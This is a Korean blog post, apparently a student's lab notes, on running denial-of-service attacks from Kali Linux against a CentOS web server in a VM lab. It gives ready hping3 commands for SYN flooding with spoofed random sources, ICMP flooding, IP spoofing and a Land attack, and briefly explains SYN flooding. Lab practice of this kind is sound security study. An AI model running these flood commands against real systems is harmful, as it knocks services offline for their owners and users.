네트워크 해킹 dos기법

공격기법 및 탐지|2020. 11. 30. 17:37

dos 공격 혼자서 한특정곳에 공격함

네트워크 해킹

 

칼리 열기

 

network

 

vm08번으로

 

edit

virtual Network Editer

진입하려서 kali 리눅스, 서버 컴퓨터 (공격 타겟)

같은 네트워크 구성

두 개 다 브릿지 설정 or Vmnet8(NAT)고정

겹칠까봐 VMnet8번으로

 

Centos8, kali 동일 네트워크 브릿지 또는 vmnet8

 

 

 

hping3 —rand-source

 

 

Cenos8 에서

 

 

레드햇 계열 우분투 계열

systemctl start httpd // service apache2 start

Systemctl status httpd // service apche2 status

 

dnf install 파일 이름// apt-get install [파일이름

 

 

---------------------------------------------------------------------------------------------------------

 

 

 

 

칼리리눅스에서

centos 에서도 wireshark 키기

hping3 --rand-source 192.168.80.131 -p 80 -S

치기

타겟ip

 

그뒤에 wire shark 로 확인

 

hping3 --rand-source --flood 192.168.80.131 -p -S

 

랜덤으로 임의의 주소로 192.168.80.131 로 syn 패킷을보냄

 

 

씽크 플러딩은

TCP/IP 통신 프로토콜의 문제점을 악용한 서비스거부(Denial of Service) 공격의 하나로 공격자는 목적 호스트에 자신의 소스주 소를 존재하지않는 임의의 주소로 속인 후 연속적인 SYN 패킷을 보낸다. 그러면 목적 호스트는 SYN 패킷을 받은 후 응답(SYN,ACK )을 하게 되고 이 응답(SYN,ACK)의 응답(ACK)을 기다리게 된다. 하지만 소스주소가 속여서 보내졌으므로 응답은 오지않고 목적 호스트는 일정시간(timeout)동안 기다리다가 접속과정을 마치게 된다.

 

 

 

 

 

 

 

 

 

 

--------------------------------------------------------------------------------------------------

centos에서

 

systemctl start httpd

Systemctl status httpd

 

이거한뒤에

칼리에서

 

hping3 --rand-source --flood 192.168.80.131 -p 80 -S

 

씽크 플러딩 공격

hping3 --rand-source --flood [타겟주소] -p 80 -S

 

 

 

 

ping of death공격

hping3 --icmp --rand-source --flood 192.168.80.131 -d 50000

타겟주소 패킷크기

icmp flooding

 

 

 

 

hping3 -a 192.168.80.131 192.168.80.132 --icmp --flood

-a[아이피] IP spoofing(IP변조)

 

 

 

 

Land ATTACK

타겟(centos) 192.168.80.131

공격자(kalilinux) 192.168.80.132

타겟 ip가 공격자ip 로 변환하여 공격하는방법

 

hping3 -a 192.168.80.131 192.168.80.131 --icmp --flood

-a[아이피]

hping3 -a [변조시킬IP] [공격대상IP] --icmp --flood

 

 

 

 

 

 

setuid 프로세스가 실행중에만 소유자(root)의 권한으로 프로세스를 실행

 

 

 

exe 단독으로실행

dll 공통으로 쓰는 모듈들을 저장힘.

'공격기법 및 탐지' 카테고리의 다른 글

tcp half open scan  (0) 2021.01.04
tcp syn(full. open. connect) scan  (0) 2021.01.04
네트워크 - 중요이론  (0) 2021.01.04
네트워크 arp 스푸핑  (0) 2020.11.30
네트워크 dns 스푸핑  (0) 2020.11.30

댓글()